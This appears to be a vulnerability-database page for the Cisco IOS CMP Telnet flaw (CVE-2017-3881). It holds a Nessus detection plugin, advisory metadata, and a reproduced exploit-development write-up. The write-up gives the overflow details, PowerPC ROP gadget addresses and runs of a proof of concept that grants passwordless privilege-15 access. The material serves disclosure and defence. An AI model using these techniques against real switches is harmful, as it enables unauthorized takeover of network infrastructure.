"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvd48893. Alternatively, as a workaround, disable the Telnet protocol for incoming connections."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios_xe"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("cisco_ios_xe_version.nasl"); script_require_keys("Host/Cisco/IOS-XE/Version"); exit(0); } include("audit.inc"); include("cisco_func.inc"); include("cisco_kb_cmd_func.inc"); flag = 0; override = 0; cmds = make_list(); ver = get_kb_item_or_exit("Host/Cisco/IOS-XE/Version"); # Check for vuln version # these were extracted from the CVRF if ( ver == "2.2.0" || ver == "2.2.1" || ver == "2.2.2" || ver == "2.2.3" || ver == "2.3.0" || ver == "2.3.1" || ver == "2.3.1t" || ver == "2.3.2" || ver == "2.4.0" || ver == "2.4.1" || ver == "2.4.2" || ver == "2.4.3" || ver == "2.5.0" || ver == "2.5.1" || ver == "2.6.0" || ver == "2.6.1" || ver == "3.1.0SG" || ver == "3.1.1SG" || ver == "3.2.0SG" || ver == "3.2.0XO" || ver == "3.2.10SG" || ver == "3.2.11SG" || ver == "3.2.2SG" || ver == "3.2.3SG" || ver == "3.2.4SG" || ver == "3.2.5SG" || ver == "3.2.6SG" || ver == "3.2.7SG" || ver == "3.2.8SG" || ver == "3.2.9SG" || ver == "3.3.0SG" || ver == "3.3.0SQ" || ver == "3.3.0XO" || ver == "3.3.1SG" || ver == "3.3.1SQ" || ver == "3.3.1XO" || ver == "3.3.2SG" || ver == "3.3.2XO" || ver == "3.4.0SG" || ver == "3.4.0SQ" || ver == "3.4.1SG" || ver == "3.4.1SQ" || ver == "3.4.2SG" || ver == "3.4.3SG" || ver == "3.4.4SG" || ver == "3.4.5SG" || ver == "3.4.6SG" || ver == "3.4.7aSG" || ver == "3.4.7SG" || ver == "3.4.8SG" || ver == "3.4.9SG" || ver == "3.5.0E" || ver == "3.5.0SQ" || ver == "3.5.1E" || ver == "3.5.1SQ" || ver == "3.5.2E" || ver == "3.5.2SQ" || ver == "3.5.3E" || ver == "3.5.3SQ" || ver == "3.5.4SQ" || ver == "3.5.5SQ" || ver == "3.6.0E" || ver == "3.6.1E" || ver == "3.6.2E" || ver == "3.6.3E" || ver == "3.6.4E" || ver == "3.6.5aE" || ver == "3.6.5bE" || ver == "3.6.5E" || ver == "3.6.6E" || ver == "3.7.0E" || ver == "3.7.1E" || ver == "3.7.2E" || ver == "3.7.3E" || ver == "3.7.4E" || ver == "3.8.0E" || ver == "3.8.0EX" || ver == "3.8.1E" || ver == "3.8.2E" || ver == "3.8.3E" || ver == "3.9.0E" || ver == "3.9.1E" ) flag++; if(!flag) audit(AUDIT_INST_VER_NOT_VULN, "Cisco IOS XE", ver); # Check if the CMP subsystem is present, then # Check that device is configured to accept incoming Telnet connections if (get_kb_item("Host/local_checks_enabled")) { flag = 0; # CMP subsystem check command = "show subsys class protocol | include ^cmp"; command_kb = "Host/Cisco/Config/" + command; buf = cisco_command_kb_item(command_kb, command); if (check_cisco_result(buf)) { if (!preg(string:buf, pattern:"^cmp\s+Protocol", multiline:TRUE)) { # cmp subsystem is not present, so we can audit out as the # device is not vuln audit(AUDIT_INST_VER_NOT_VULN, "Cisco IOS XE", ver + " without the CMP subsystem"); } # otherwise the CMP subsystem is present so we continue on to check # if incoming telnet is enabled cmds = make_list(cmds, command); } else if (cisco_needs_enable(buf)) { flag = 1; override = 1; } # check that the device is configured to accept incoming Telnet connections # from the advisory command = "show running-config | include ^line vty|transport input"; command_kb = "Host/Cisco/Config/" + command; buf = cisco_command_kb_item(command_kb, command); if (check_cisco_result(buf)) { # if transport input lists "all" or "telnet", we are vuln # otherwise, if there is a "line vty" that is not followed by a # transport input line, we are vuln # otherwise, we are not vuln if (preg(string:buf, pattern:"^\s+transport input.*(all|telnet).*", multiline:TRUE)) { flag = 1; cmds = make_list(cmds, command); } else { lines = split(buf, keep:FALSE); for (i = 0; i < max_index(lines); i++) { line = lines[i]; if ((i+1) >= max_index(lines)) next_line = ""; else next_line = lines[i+1]; if (line =~ "^line vty" && next_line !~ "^\s+transport input") { flag = 1; cmds = make_list(cmds, command); break; } } } } else if (cisco_needs_enable(buf)) { flag = 1; override = 1; } # no CMP subsystem, no telnet enabled = not vuln if (!flag && !override) audit(AUDIT_OS_CONF_NOT_VULN, "Cisco IOS XE", ver); } if (flag) { security_report_cisco( port : 0, severity : SECURITY_HOLE, override : override, version : ver, bug_id : 'CSCvd48893', cmds : cmds ); } else audit(AUDIT_HOST_NOT, "affected");
Packetstorm
data source https://packetstormsecurity.com/files/download/142121/ciscocatalyst2960-exec.txt id PACKETSTORM:142121 last seen 2017-04-13 published 2017-04-13 reporter Artem Kondratenko source https://packetstormsecurity.com/files/142121/Cisco-Catalyst-2960-IOS-12.2-55-SE11-Remote-Code-Execution.html title Cisco Catalyst 2960 IOS 12.2(55)SE11 Remote Code Execution data source https://packetstormsecurity.com/files/download/142132/ciscocatalyst2960rocem-exec.txt id PACKETSTORM:142132 last seen 2017-04-14 published 2017-04-13 reporter Artem Kondratenko source https://packetstormsecurity.com/files/142132/Cisco-Catalyst-2960-IOS-12.2-55-SE1-Remote-Code-Execution.html title Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution
Seebug
bulletinFamily | exploit |
description | 详情来源:https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ Do you still have telnet enabled on your Catalyst switches? Think twice, here’s a proof-of-concept remote code execution exploit for Catalyst 2960 switch with latest suggested firmware. Check out the exploit code [here](https://github.com/artkond/cisco-rce/). What follows is a detailed write-up of the exploit development process for the vulnerability leaked from CIA’s archive on March 7th 2017 and publicly disclosed by Cisco Systems on March 17th 2017\. At the time of writing this post there is no patch available. Nonetheless there is a remidiation - disable telnet and use SSH instead. ## Vault 7 CIA leak A series of CIA’s documents were leaked on March 7th 2017 and [published](https://wikileaks.org/ciav7p1/) on WikiLeaks. Among other publications there was an interesting preauth code execution vulnerability that affected multiple Cisco switches. This vulnerability is code-named [ROCEM](https://wikileaks.org/ciav7p1/cms/page_20250772.html) in the leaked documents. Although very few technical details were mentioned, few things stand out. The Vault 7’s documents shed a light on the testing process for the actual exploit. No exploit source code is available in the leak. Two use cases are highlighted there - the tool can be launched in either interactive mode or set mode. The interactive mode sends the payload via telnet and immeditely presents the attacker with command shell in the context of the same telnet connection. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_23134373.html): ``` Started ROCEM interactive session - successful: [email protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254 [+] Validating data/interactive.bin [+] Validating data/set.bin [+] Validating data/transfer.bin [+] Validating data/unset.bin **************************************** Image: c3560-ipbase-mz.122-35.SE5 Host: 192.168.0.254 Action: Interactive **************************************** Proceed? (y/n)y Trying 127.0.0.1... [*] Attempting connection to host 192.168.0.254:23 Connected to 127.0.0.1. Escape character is '^]'. [+] Connection established [*] Starting interactive session User Access Verification Password: MLS-Sth# MLS-Sth# show priv Current privilege level is 15 MLS-Sth#show users Line User Host(s) Idle Location * 1 vty 0 idle 00:00:00 192.168.221.40 Interface User Mode Idle Peer Address MLS-Sth#exit Connection closed by foreign host. ``` Set mode. Modify switch memory in order to make any subsequent telnet connections passwordless. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_24969226.html): ``` Test set/unset feature of ROCEM DUT configured with target configuration and network setup DUT is accessed by hopping through three flux nodes as per the CONOP Reloaded DUT to start with a clean device From Adverse ICON machine, set ROCEM: [email protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254 [+] Validating data/interactive.bin [+] Validating data/set.bin [+] Validating data/transfer.bin [+] Validating data/unset.bin **************************************** Image: c3560-ipbase-mz.122-35.SE5 Host: 192.168.0.254 Action: Set **************************************** Proceed? (y/n)y [*] Attempting connection to host 192.168.0.254:23 [+] Connection established [*] Sending Protocol Step 1 [*] Sending Protocol Step 2 [+] Done [email protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# Verified I could telnet and rx priv 15 without creds: [email protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254 Trying 192.168.0.254... Connected to 192.168.0.254. Escape character is '^]'. MLS-Sth# MLS-Sth#show priv Current privilege level is 15 MLS-Sth# ``` One piece of information being useful for me in researching this vulnerability was a telnet debug output. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_17760327.html): ``` 14\. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output 1.Enabled debug telnet on DUT 2.Set ROCEM 3.Observed the following: 000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused) 000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32) 000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused) 000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33) 000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34) 000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented) 000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39) 000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented) 000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5) 000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented) 000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused) 000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35) 000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1) 000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29 000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X 000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap ``` Note the `CISCO_KITS` option received by the service on the last line. This prooved to be an important string. ## Cisco advisory On March 17th 2017 Cisco Systems [disclosed](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp) a vulnerability present in their switches. This diclosure was based on the documents from Vault 7: > A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. Not much details were available at the time of writing this article, except for the following paragraph: > The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: > > * The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and > * The incorrect processing of malformed CMP-specific Telnet options. Long story short, the vulnerability allows the attacker to exploit telnet service to gain remote code execution on the target switch. But in order to make any use of this advisory I needed more information on the matter. So I decided dig deeper into Cisco Cluster Management Protocol. ## Switch clustering All right! I had two Catalyst 2960 switches for researching this vulnerability. Clustering sets a master-slave relation between switches. Master switch is able to get a privileged command shell on the slave. As Cisco mentioned in its adivisory, telnet is used as a command protocol between cluster members. Some info on clustering can be found [here](http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750x_3560x/software/release/12-2_55_se/configuration/guide/3750xscg/swclus.pdf) and [here’s](https://slaptijack.com/networking/cisco-catalyst-configuration-using-cluster-commands/) an example of setting up a cluster environment. Now to look for cluster traffic between them. The following should be in the master switch config: ``` cluster enable CLGRP 0 cluster member 1 mac-address xxxx.xxxx.xxxx ``` This will add a nearby switch as a cluster slave. `rcommand <num>` allows to get command interface on a slave switch from the master’s interface. This is expected by design. ``` catalyst1>rcommand 1 catalyst2>who Line User Host(s) Idle Location * 1 vty 0 idle 00:00:00 10.10.10.10 Interface User Mode Idle Peer Address ``` Let’s look at the traffic generated by `rcommand`: ![](https://images.seebug.org/content/images/2017/04/pic/llc_traffic.png) Hey! Where da hell is telnet traffic? Advisory clearly states: > The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. Ok, running `show version` to see some more traffic: ``` catalyst2>show version Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE1, RELEASE SOFTWARE (fc1) ``` Aha! Telnet traffic is actualy being incapsulated into layer 2 LLC packet. If we look close enough we will notice IP packets inside with chopped MAC addresses at source and destination fields. Inside those “IP” packets reside valid TCP frames with a telnet session. ![](https://images.seebug.org/content/images/2017/04/pic/show_ver_cluster.png) A telnet session is usually preceded by negotiating telnet options. Among them are: terminal size, terminal type etc. Take a look at the [RFC](https://tools.ietf.org/html/rfc854) for more info. Right before being presented with the welcome `catalyst2>` message an interesting telnet option is transfered to the server side: ![](https://images.seebug.org/content/images/2017/04/pic/cisco_kits_traffic.png) Here you can see a telnet option “CISCO_KITS” sent from the master switch to the slave. The very same string present in the Vault 7 documents during the execution of exploit. Time to take a closer look at the switch internals. ## Peeking at firmware Firmware is located at `flash:<version>.bin` on the switch. ``` catalyst2#dir flash: Directory of flash:/ 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122-55.SE1.bin 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text ``` Built-in ftp client allows to transfer this firmware to an arbitrary ftp server. Ok, now to analyze and extract contents of the file with [binwalk](https://github.com/devttys0/binwalk): ``` $ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 112 0x70 bzip2 compressed data, block size = 900k ``` In order to facilitate static analisys of the resulting binary we better know the firmware load offset. This offset is printed to serial console during boot process: ``` Loading "flash:c2960-lanbasek9-mz.122-55.SE1.bin"...@@@@@@@@@@@@@@@@@@@@@@ File "flash:c2960-lanbasek9-mz.122-55.SE1.bin" uncompressed and installed, entry point: 0x3000 executing... ``` Fire up IDA and let’s roll. CPU architecture is PowerPC 32-bit BigEndian. Load the binary at 0x3000: ![](https://images.seebug.org/content/images/2017/04/pic/ida_offset.png) ### Discovering strings Remember the `CISCO_KITS` string in the cluser traffic I captured before? This was my starting point. After discovering most of the functions in IDA, I was able to see the cross-refrences to the strings located at the end of firmware. ![](https://images.seebug.org/content/images/2017/04/pic/ida_cisco_kits.png) “CISCO_KITS” string is referenced by `return_cisco_kits` function, which just returns this string as `char *`. We will focus out attention on on the `call_cisco_kits` function at `0x0004ED8C` which calls `return_cisco_kits`. ![](https://images.seebug.org/content/images/2017/04/pic/ida_proximity1.png) Because telnet code is rather symmetrical for client and server here we actually can see the format of the buffer that is being sent to the server side - `%c%s%c%d:%s:%d:`. This actually goes in line with the observed traffic where the sent buffer was `\x03CISCO_KITS\x012::1:` ``` if ( telnet_struct->is_client_mode ) // client mode? then send "CISCO_KITS" string { if ( telnet_struct->is_client_mode == 1 ) { cisco_kits_string_2 = (char *)return_cisco_kits(); int_two = return_2(); tty_str = get_from_tty_struct((telnet_struct *)telnet_struct_arg->tty_struct); *(_DWORD *)&telnet_struct_arg->tty_struct[1].field_6D1; format1_ret = format_1( 128, (int)&str_buf[8], "%c%s%c%d:%s:%d:", 3, cisco_kits_string_2, 1, int_two, tty_str, 0); telnet_struct = (telnet_struct *)telnet_send_sb( (int)telnet_struct_arg, 36, 0, &str_buf[8], format1_ret, v8, v7, v6); } } ``` Notice something? There are two `%s` string modifiers but only one string is actually present in the traffic sample which is `CISCO_KITS`, the second one is empty and is confined between two `:` chars. Further observing the control flow of the very same function I noticed some funny behaviour when dealing with the second string (this time the server-side portion of the code): ``` for ( j = (unsigned __int8)*string_buffer; j != ':'; j = (unsigned __int8)*string_buffer )// put data before second ":" at &str_buf + 152 { str_buf[v19++ + 152] = j; ++string_buffer; } ``` The data we sent over in the second %s string is actually copied until `:` char without checking the destination boundaries while the target buffer resides on the stack. What does this look like? Correct! ~~Buffalo~~ buffer overflow! ![](https://images.seebug.org/content/images/2017/04/pic/buffalo_overflow.png) ## Getting code execution Getting control of the instruction pointer was easy as it was overwritten with the buffer I sent (btw I used [IODIDE](https://github.com/nccgroup/IODIDE) for debugging). The problem was that heap and stack (which resides on the heap) were not executable. My best bet is that this is actually the effect of data and instruction caches enabled. Here’s a slide from Felix Lindner’s [presentation](https://www.blackhat.com/presentations/bh-usa-09/LINDNER/BHUSA09-Lindner-RouterExploit-SLIDES.pdf) at BlackHat 2009: ![](https://images.seebug.org/content/images/2017/04/pic/caches.png) ### ROPing a way out Since there wasn’t a way to execute code on the stack I had to use it as a data buffer and reuse existing code in the firmware. The idea is to chain function epilogs in a meaningful way to perform arbitary memory writes. But wait, write what? Take a look at the decompiled function at `0x00F47A34`: ``` if ( ptr_is_cluster_mode(tty_struct_var->telnet_struct_field) ) { telnet_struct_var = tty_struct_var->telnet_struct_field; ptr_get_privilege_level = (int (__fastcall *)(int))some_libc_func(0, (unsigned int *)&dword_22659D4[101483]); privilege_level = ptr_get_privilege_level(telnet_struct_var);// equals to 1 during rcommand 1 telnet_struct_1 = tty_struct_var->telnet_struct_field; ptr_telnet_related2 = (void (__fastcall *)(int))some_libc_func(1u, (unsigned int *)&dword_22659D4[101487]); ptr_telnet_related2(telnet_struct_1); *(_DWORD *)&tty_struct_var->privilege_level_field = ((privilege_level << 28) & 0xF0000000 | *(_DWORD *)&tty_struct_var->privilege_level_field & 0xFFFFFFF) & 0xFF7FFFFF; } else { //generic telnet session } ``` Interesting things happen here. First thing to emphasize is that both calls of `ptr_is_cluster_mode` and `ptr_get_privilege_level` are made indirectly by referencing global variables. Check line at address `0x00F47B60` - `is_cluster_mode` function address is being loaded from dword at `0x01F24A7`. In a similar way the address of `get_privilege_level` is being loaded from `r3` register at `0x00F47B8C`. At this point `r3` contents is a dereferenced pointer residing at address `0x022659D4 + 0x28 + 0xC`. ![](https://images.seebug.org/content/images/2017/04/pic/ida_dis.png) If the `ptr_is_cluster_mode` call returns non zero and `ptr_get_privilege` call returns a value that differs from -1 we will be presented with a telnet shell without the need to provide any credentials. Variable `privilege_level` is being checked for its value further down the code: ![](https://images.seebug.org/content/images/2017/04/pic/privilege_level_br.png) What if I could overwrite these function pointers to something that always return the desired positive value? Since stack and heap weren’t directly executable I had to reuse the existing code to performs such memory writes. The following [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) gadgets were used: ``` 0x000037b4: lwz r0, 0x14(r1) mtlr r0 lwz r30, 8(r1) lwz r31, 0xc(r1) addi r1, r1, 0x10 blr ``` Load `is_cluster_mode` function pointer into `r30`, load the value to overwrite this pointer into `r31`. The value to overwrite is an address of a function that always returns 1: ![](https://images.seebug.org/content/images/2017/04/pic/return_1_function.png) ``` 0x00dffbe8: stw r31, 0x34(r30) lwz r0, 0x14(r1) mtlr r0 lmw r30, 8(r1) addi r1, r1, 0x10 blr ``` Perform the actual write. ``` 0x0006788c: lwz r9, 8(r1) lwz r3, 0x2c(r9) lwz r0, 0x14(r1) mtlr r0 addi r1, r1, 0x10 blr ``` ``` 0x006ba128: lwz r31, 8(r1) lwz r30, 0xc(r1) addi r1, r1, 0x10 lwz r0, 4(r1) mtlr r0 blr ``` Previous two gadgets load a pointer of `get_privilege_level` function into `r3`, and the value to overwrite it with into `r31`. The target value is a function that returns 15 (could’ve used this function for both writes tho): ![](https://images.seebug.org/content/images/2017/04/pic/return_15_function.png) ``` 0x0148e560: stw r31, 0(r3) lwz r0, 0x14(r1) mtlr r0 lwz r31, 0xc(r1) addi r1, r1, 0x10 blr ``` This epilog makes the final write and returns to the legitimate execution flow. Of course, stack frame should be formed accordingly to make this rop chain work. Check out the exploit [source](https://github.com/artkond/cisco-rce/blob/master/c2960-lanbasek9-m-12.2.55.se1.py) to see the actual stack layout for this chain to work as intended. ### Running the exploit At the end of the day I ended up with a tool with the ability to patch function pointers responsible for credless connection and privilege level. Note that the exploit code is heavily dependent on the exact firmware version used on the switch. Using exploit code for some different firmware most probably will crash the device. I used the knowledge from static and dynamic analisys of an older firmware SE1 to build an exploit for the latest suggested firmware 12.2(55)SE11\. All the difference between firmware versions is different functions and pointers offsets. Also, the way the exploit works makes it easy to revert the changes back. Example: ``` $ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --set [+] Connection OK [+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f' [+] Sending cluster option [+] Setting credless privilege 15 authentication [+] All done $ telnet 192.168.88.10 Trying 192.168.88.10... Connected to 192.168.88.10. Escape character is '^]'. catalyst1#show priv Current privilege level is 15 catalyst1#show ver Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3) ... System image file is "flash:c2960-lanbasek9-mz.122-55.SE11.bin" ... cisco WS-C2960-48TT-L (PowerPC405) processor (revision B0) with 65536K bytes of memory. ... Model number : WS-C2960-48TT-L ... Switch Ports Model SW Version SW Image ------ ----- ----- ---------- ---------- * 1 50 WS-C2960-48TT-L 12.2(55)SE11 C2960-LANBASEK9-M Configuration register is 0xF ``` To unset this behaviour: ``` $ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --unset [+] Connection OK [+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\ncatalyst1#' [+] Sending cluster option [+] Unsetting credless privilege 15 authentication [+] All done $ telnet 192.168.88.10 Escape character is '^]'. User Access Verification Password: ``` This RCE POC is available [here](https://github.com/artkond/cisco-rce/) for both firware versions. DoS version of this exploit is [available](https://github.com/artkond/cisco-rce/blob/master/ios_telnet_rocem.rb) as a metasploit module, it might work for most models mentioned in the Cisco advisory. |
id | SSV:92932 |
last seen | 2017-11-19 |
modified | 2017-04-10 |
published | 2017-04-10 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-92932 |
title | Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881) |
The Hacker News
id THN:02E235897DBA5868AE53102FE4D52D7B last seen 2018-01-27 modified 2017-03-20 published 2017-03-19 reporter Swati Khandelwal source https://thehackernews.com/2017/03/cisco-network-switch-exploit.html title Disable TELNET! Cisco finds 0-Day in CIA Dump affecting over 300 Network Switch Models id THN:BCA8EAC492CA7110C715BA2B88A40246 last seen 2018-01-27 modified 2017-05-10 published 2017-05-10 reporter Mohit Kumar source https://thehackernews.com/2017/05/cisco-network-switch-update.html title Cisco Finally Patches 0-Day Exploit Disclosed In Wikileaks-CIA Leak
References
- http://www.securityfocus.com/bid/96960
- http://www.securityfocus.com/bid/96960
- http://www.securityfocus.com/bid/97391
- http://www.securityfocus.com/bid/97391
- http://www.securitytracker.com/id/1038059
- http://www.securitytracker.com/id/1038059
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
- https://www.exploit-db.com/exploits/41872/
- https://www.exploit-db.com/exploits/41872/
- https://www.exploit-db.com/exploits/41874/
- https://www.exploit-db.com/exploits/41874/